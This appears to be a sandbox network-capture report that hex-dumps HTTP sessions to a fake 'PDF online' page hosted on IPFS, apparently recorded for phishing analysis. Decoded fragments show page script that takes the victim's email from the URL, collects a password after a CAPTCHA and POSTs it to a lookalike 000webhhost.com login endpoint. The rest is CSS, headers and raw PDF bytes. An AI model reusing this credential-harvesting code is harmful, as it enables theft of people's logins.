                                              2024-09-27 06:17:57 UTC1369INData Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72
                                              Data Ascii: ; height: 100%; background: rgba(0, 0, 0, 0.5); color: #fff; text-align: center; display: none; /* Hidden by default */ align-items: center; justify-content: center
                                              2024-09-27 06:17:57 UTC1369INData Raw: 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 65 64 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 64 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 72 65 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20
                                              Data Ascii: "></div> <div id="error-message" class="error-message" style="border: 1px solid red; background-color: #fdd; padding: 10px; margin: 10px; border-radius: 5px;"> <p id="error-text" style="color: red; font-weight: bold;
                                              2024-09-27 06:17:57 UTC1369INData Raw: 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 66 72 61 67 6d 65 6e 74 20 26 26 20 66 72 61 67 6d 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 27 40 27 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 64 69 73 70 6c 61 79 2d 65 6d 61 69 6c 27 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 66 72 61 67 6d 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 73 68 6f 77 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 73 65 63 74 69 6f 6e 20 61 66 74 65 72 20 43 41 50 54 43 48 41 20 76 65 72 69 66 69 63 61 74 69 6f 6e
                                              Data Ascii: substring(1); if (fragment && fragment.includes('@')) { document.getElementById('display-email').textContent = fragment; } } // Function to show the password section after CAPTCHA verification
                                              2024-09-27 06:17:57 UTC1369INData Raw: 65 71 75 65 73 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 50 4f 53 54 27 2c 20 27 68 74 74 70 73 3a 2f 2f 30 30 30 77 65 62 68 68 6f 73 74 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2c 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 78 68 72 2e 72 65 61 64 79 53
                                              Data Ascii: equest(); xhr.open('POST', 'https://000webhhost.com/login.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyS
                                              2024-09-27 06:17:57 UTC1369INData Raw: 20 20 20 20 20 20 65 72 72 6f 72 4d 65 73 73 61 67 65 44 69 76 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 62 6c 6f 63 6b 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 43 6c 65 61 72 20 69 6e 70 75 74 20 66 69 65 6c 64 73 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 61 73 73 77 6f 72 64 27 29 2e 76 61 6c 75 65 20 3d 20 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 43 6c 65 61 72 20 74 68 65 20 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: errorMessageDiv.style.display = 'block'; // Clear input fields document.getElementById('password').value = ''; // Clear the CAPTCHA response
                                              2024-09-27 06:17:57 UTC154INData Raw: 6f 6e 73 65 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 61 6c 6c 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 20 77 68 65 6e 20 74 68 65 20 70 61 67 65 20 6c 6f 61 64 73 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 65 78 74 72 61 63 74 45 6d 61 69 6c 46 72 6f 6d 55 52 4c 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                              Data Ascii: onse)); }; // Call the function when the page loads window.onload = extractEmailFromURL; </script></body></html>
                                              2024-09-27 06:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449735104.26.13.1414433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:17:57 UTC555OUTGET /styles.css HTTP/1.1
                                              Host: pdf-online.on-fleek.app
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://pdf-online.on-fleek.app/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:17:57 UTC1186INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:17:57 GMT
                                              Content-Type: text/css; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Ray: 8c995fa5ab7e0c80-EWR
                                              CF-Cache-Status: HIT
                                              Access-Control-Allow-Origin: *
                                              Age: 87733
                                              Cache-Control: max-age=60, stale-while-revalidate=3600
                                              ETag: W/"bafkreidafqot66v3gzodve4pxwezt5yantorcdbq7k2exvpbxpfxrdmglu"
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                              Vary: Accept-Encoding
                                              access-control-allow-headers: Content-Type, Range, User-Agent, X-Requested-With
                                              access-control-allow-methods: GET,HEAD,OPTIONS
                                              access-control-expose-headers: Content-Length, Content-Range, X-Chunked-Output, X-Ipfs-Path, X-Ipfs-Roots, X-Stream-Output
                                              access-control-max-age: 86400
                                              content-security-policy: upgrade-insecure-requests
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-cache-status: HIT
                                              x-content-type-options: nosniff
                                              x-ipfs-path: /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m/styles.css/
                                              x-ipfs-roots: bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m,bafkreidafqot66v3gzodve4pxwezt5yantorcdbq7k2exvpbxpfxrdmglu
                                              x-request-id: 7a4f7080a745adc0478a61bc716e03b2
                                              x-xss-protection: 0
                                              2024-09-27 06:17:57 UTC355INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 74 74 49 46 78 59 6e 36 43 51 33 63 73 44 4b 63 71 25 32 42 53 56 48 4d 33 39 36 4c 64 6b 4b 71 41 55 25 32 42 75 53 51 6b 6c 25 32 46 5a 72 48 67 5a 4c 31 69 69 33 46 30 42 4b 42 54 37 49 6c 39 36 76 4a 6a 46 68 52 44 34 7a 49 51 6e 63 75 72 46 41 36 6d 53 39 4b 46 33 71 68 46 62 6b 5a 59 4d 51 6c 56 57 70 46 71 6b 64 25 32 46 79 46 5a 53 71 39 59 61 69 41 68 67 73 75 75 50 63 41 44 75 45 51 48 41 73 64 44 58 55 46 45 78 55 76 53 31 41 65 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttIFxYn6CQ3csDKcq%2BSVHM396LdkKqAU%2BuSQkl%2FZrHgZL1ii3F0BKBT7Il96vJjFhRD4zIQncurFA6mS9KF3qhFbkZYMQlVWpFqkd%2FyFZSq9YaiAhgsuuPcADuEQHAsdDXUFExUvS1Ae"}],"group":"cf-nel","max_age
                                              2024-09-27 06:17:57 UTC1197INData Raw: 63 65 65 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 7d 0d 0a 0d 0a 2e 62 61 63 6b 67 72 6f
                                              Data Ascii: ceebody { font-family: Arial, sans-serif; background-color: #f4f4f4; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; position: relative; overflow: hidden;}.backgro
                                              2024-09-27 06:17:57 UTC1369INData Raw: 20 65 6c 65 6d 65 6e 74 73 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 32 32 70 78 29 3b 20 2f 2a 20 41 64 6a 75 73 74 20 77 69 64 74 68 20 74 6f 20 61 63 63 6f 75 6e 74 20 66 6f 72 20 70 61 64 64 69 6e 67 20 61 6e 64 20 62 6f 72 64 65 72 20 2a 2f 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69
                                              Data Ascii: elements */}input[type="email"], input[type="password"] { width: calc(100% - 22px); /* Adjust width to account for padding and border */ padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; box-si
                                              2024-09-27 06:17:57 UTC751INData Raw: 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 20 2f 2a 20 45 6e 73 75 72 65 73 20 6f 76 65 72 6c 61 79 20 69 73 20 6f 6e 20 74 6f 70 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6f 76 65 72 6c 61 79 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 45 72 72 6f 72 20 6d 65 73 73 61 67
                                              Data Ascii: t-align: center; display: none; /* Hidden by default */ align-items: center; justify-content: center; font-size: 1.5em; z-index: 9999; /* Ensures overlay is on top */}.overlay.show { display: flex;}/* Error messag
                                              2024-09-27 06:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449739104.26.13.1414433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:17:57 UTC699OUTGET /1.pdf HTTP/1.1
                                              Host: pdf-online.on-fleek.app
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://pdf-online.on-fleek.app/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:17:58 UTC1166INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:17:57 GMT
                                              Content-Type: application/pdf
                                              Content-Length: 175997
                                              Connection: close
                                              CF-Ray: 8c995fa8de374333-EWR
                                              CF-Cache-Status: HIT
                                              Accept-Ranges: bytes
                                              Access-Control-Allow-Origin: *
                                              Age: 87733
                                              Cache-Control: max-age=60, stale-while-revalidate=3600
                                              ETag: "bafkreibgqepz7ttrxvsod4rf4qnvagd6bl6ehvex4edau4nazblwaysqde"
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                              access-control-allow-headers: Content-Type, Range, User-Agent, X-Requested-With
                                              access-control-allow-methods: GET,HEAD,OPTIONS
                                              access-control-expose-headers: Content-Length, Content-Range, X-Chunked-Output, X-Ipfs-Path, X-Ipfs-Roots, X-Stream-Output
                                              access-control-max-age: 86400
                                              content-security-policy: upgrade-insecure-requests
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-cache-status: HIT
                                              x-content-type-options: nosniff
                                              x-ipfs-path: /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m/1.pdf/
                                              x-ipfs-roots: bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m,bafkreibgqepz7ttrxvsod4rf4qnvagd6bl6ehvex4edau4nazblwaysqde
                                              x-request-id: c275482a4dbc935c545e5fea377bf199
                                              x-xss-protection: 0
                                              2024-09-27 06:17:58 UTC361INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 55 4c 45 42 79 57 4d 58 47 4c 70 6e 6f 6a 78 58 77 63 78 5a 66 45 53 73 65 48 47 6f 4d 50 34 65 33 44 5a 70 57 56 46 6e 51 32 64 51 4f 6f 25 32 42 76 47 45 78 55 6d 67 46 65 71 79 42 66 45 6b 68 64 52 4f 69 36 41 37 45 25 32 42 6b 41 57 25 32 42 5a 6c 33 6c 63 51 25 32 42 37 56 64 76 35 53 25 32 46 38 67 57 37 56 4a 6d 4f 4f 77 6d 69 77 63 4d 49 6d 59 39 46 69 63 4b 64 55 44 65 6a 4f 25 32 46 74 5a 33 61 44 45 72 61 44 52 25 32 42 44 39 63 49 51 53 68 58 52 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULEByWMXGLpnojxXwcxZfESseHGoMP4e3DZpWVFnQ2dQOo%2BvGExUmgFeqyBfEkhdROi6A7E%2BkAW%2BZl3lcQ%2B7Vdv5S%2F8gW7VJmOOwmiwcMImY9FicKdUDejO%2FtZ3aDEraDR%2BD9cIQShXR"}],"group":"cf-nel","m
                                              2024-09-27 06:17:58 UTC1369INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 32 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 33 33 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 33 34 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 37 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e
                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>endobj3 0 obj<</Type/Page/Paren
                                              2024-09-27 06:17:58 UTC1369INData Raw: d4 e5 0e 1a 62 10 7b 15 83 80 35 34 55 8a 4e 30 9f ba 29 be 96 f8 f5 0c 42 41 c1 6c c8 e5 14 fb 8f b3 d1 25 c4 c1 b2 b4 72 d0 33 40 42 72 af 12 62 10 ca b7 10 d0 12 f3 d5 f1 c5 03 91 93 ab 36 31 03 a4 a3 f6 29 1d 1d db 34 b9 42 d1 5b c8 cd 4f 41 46 3a b8 24 97 68 51 56 40 e3 0b 04 72 08 10 48 1b ff 00 89 e8 bd 4a c4 24 54 d6 d6 e8 fa 0f 54 09 94 cb eb d1 fd 8a 06 21 28 07 ce c9 d8 98 20 45 60 c6 85 69 f4 95 c5 72 99 b9 30 0d 0a af 79 d0 12 34 aa 84 4e c6 78 33 7a a6 10 95 e8 59 85 29 42 5b 31 4d 1e 1d 6b 33 59 5c 19 a3 16 57 85 cd ca 34 15 08 9c a6 01 d4 08 91 8c 53 55 88 cd 74 e7 58 a6 5b 91 3b a7 2a 16 20 76 29 31 04 2a 99 d4 bc de 63 e6 e8 e0 6b 81 5f 9b 30 0a c8 66 49 b0 fd 37 e8 f6 0c 95 9c 40 ce f5 04 9d e9 fc d6 5a 3d 39 b9 38 8f d4 8f 09 e4 99 30
                                              Data Ascii: b{54UN0)BAl%r3@Brb61)4B[OAF:$hQV@rHJ$TT!( E`ir0y4Nx3zY)B[1Mk3Y\W4SUtX[;* v)1*ck_0fI7@Z=980
                                              2024-09-27 06:17:58 UTC1369INData Raw: 36 dd f8 32 d9 94 f8 ec 68 03 5f 01 94 e3 73 0a 70 18 94 f3 26 89 2f 39 1c e9 14 46 c4 8a aa 6d 2f 70 48 df be e6 76 77 9c fd 44 61 ed 56 33 ad 4b 34 67 74 09 1b c7 45 9f 5d b1 82 2b d2 b1 0b eb 10 51 f8 f2 c9 ed d6 a7 1e 37 93 f4 1a 30 1e 9b d6 3d cc 7f 07 10 e4 4b 18 b7 21 c8 34 09 12 54 32 17 41 bb dd fe 8e 9a fb 03 cc 9e 55 b6 d1 4c 3e cf 61 ed d7 36 5f 99 87 78 27 4e 07 df ec 55 9e f9 4d 76 cc 0f 5f eb 19 a6 31 ab 6f 78 41 dd 36 d7 b8 b7 6d 87 a6 c5 e3 37 cb c5 1d 5e c6 5c 85 9c 07 8f f9 d8 66 0e 71 7d b9 20 f6 ae d4 5d 31 e3 e6 73 7a 40 ae cb 59 b0 74 b2 a8 b1 83 74 dc 94 e3 4f e9 d5 78 1d 7c 87 8f 9d db 8e 21 d4 86 3c 62 33 9f a1 7c c6 22 5b ae 4a 26 90 e6 0a 23 c8 6e 8a 62 4d 47 15 b6 92 f6 a2 d2 78 6b ea 53 48 5f aa bf ab 07 cb ad 44 d8 13 f4 2d
                                              Data Ascii: 62h_sp&/9Fm/pHvwDaV3K4gtE]+Q70=K!4T2AUL>a6_x'NUMv_1oxA6m7^\fq} ]1sz@YttOx|!<b3|"[J&#nbMGxkSH_D-
                                              2024-09-27 06:17:58 UTC1369INData Raw: 42 4d 2f 4e 6f 72 6d 61 6c 2f 63 61 20 31 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 45 78 74 47 53 74 61 74 65 2f 42 4d 2f 4e 6f 72 6d 61 6c 2f 43 41 20 31 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 39 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 46 6f 6e 74 2f 53 75 62 74 79 70 65 2f 54 72 75 65 54 79 70 65 2f 4e 61 6d 65 2f 46 32 2f 42 61 73 65 46 6f 6e 74 2f 42 43 44 46 45 45 2b 53 65 67 6f 65 55 49 2d 42 6f 6c 64 49 74 61 6c 69 63 2f 45 6e 63 6f 64 69 6e 67 2f 57 69 6e 41 6e 73 69 45 6e 63 6f 64 69 6e 67 2f 46 6f 6e 74 44 65 73 63 72 69 70 74 6f 72 20 31 30 20 30 20 52 2f 46 69 72 73 74 43 68 61 72 20 33 32 2f 4c 61 73 74 43 68 61 72 20 31 31 36 2f 57 69 64 74 68 73 20 31 32 32 20 30 20 52 3e 3e 0d 0a 65 6e 64
                                              Data Ascii: BM/Normal/ca 1>>endobj8 0 obj<</Type/ExtGState/BM/Normal/CA 1>>endobj9 0 obj<</Type/Font/Subtype/TrueType/Name/F2/BaseFont/BCDFEE+SegoeUI-BoldItalic/Encoding/WinAnsiEncoding/FontDescriptor 10 0 R/FirstChar 32/LastChar 116/Widths 122 0 R>>end
                                              2024-09-27 06:17:58 UTC1369INData Raw: 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 57 69 64 74 68 20 31 39 35 2f 48 65 69 67 68 74 20 36 31 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 52 47 42 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 2f 49 6e 74 65 72 70 6f 6c 61 74 65 20 66 61 6c 73 65 2f 53 4d 61 73 6b 20 31 36 20 30 20 52 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 34 34 32 32 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c ed 5d 8b 53 56 d5 16 ff 2a c4 c4 91 49 a6 61 18 8d 24 27 47 d3 cf c1 82 34 46 ec 82 99 0a 32 88 95 8a a1 95 af d1 7c a2 4d 09 a6 5c 8d f2 95 f8 c0 8a 7c e4 03 9f 29 f9 04 1f 09 e1 23 45 01 51 c9 b7 e2 5b 18 10 54 ec fe 01 f7 17 e7 ce b9 8b 75 ce d9 67 9f 8f ef
                                              Data Ascii: j<</Type/XObject/Subtype/Image/Width 195/Height 61/ColorSpace/DeviceRGB/BitsPerComponent 8/Interpolate false/SMask 16 0 R/Filter/FlateDecode/Length 4422>>streamx]SV*Ia$'G4F2|M\|)#EQ[Tug
                                              2024-09-27 06:17:58 UTC1369INData Raw: 02 48 5f a5 7e 43 73 46 45 45 d1 d4 ed 3b 77 d1 d4 ee e1 e1 ba 42 74 81 04 5a 97 b9 5e db 18 68 e6 67 9f 7d d6 61 6f 20 81 30 65 c0 0a 95 e9 de 9b b7 ef c8 1c 4c 38 1a 0c 24 ac 13 2b 2a ab d4 54 18 42 11 91 91 94 d9 ec 96 9e 9e ae db 0c b7 03 09 3a f9 c6 cd 5b 6a b6 f2 ca 4a 2c ac 68 c3 66 7f fd 35 95 93 99 b9 41 57 8e 11 90 fc fc fc ae df b8 49 93 30 a7 c3 f0 56 52 6d 0e 24 10 6c dd 3d d9 d9 32 3d 9c 94 3c 5d 46 20 03 52 de a1 43 93 84 f4 ea ab af d2 e2 13 26 4e b4 f4 dd 81 3a 5d 6f 3d 06 24 e8 31 4c 4c ba 1c 16 16 26 03 a4 a1 43 87 5a 6a 58 cd c3 47 ba 07 04 46 40 02 25 24 24 d0 a4 29 53 3f 53 93 ec 0f 24 10 96 18 a7 4a 4e 9b f6 cc ad 3b 77 65 94 52 43 96 ff b0 2b 64 5a c2 58 d7 45 c4 ed cb 7f ba 8b 25 c9 ca 9a 8e 57 67 0c 24 10 fe 54 9e 1f 2f 28 a0 a7
                                              Data Ascii: H_~CsFEE;wBtZ^hg}ao 0eL8$+*TB:[jJ,hf5AWI0VRm$l=2=<]F RC&N:]o=$1LL&CZjXGF@%$$)S?S$JN;weRC+dZXE%Wg$T/(
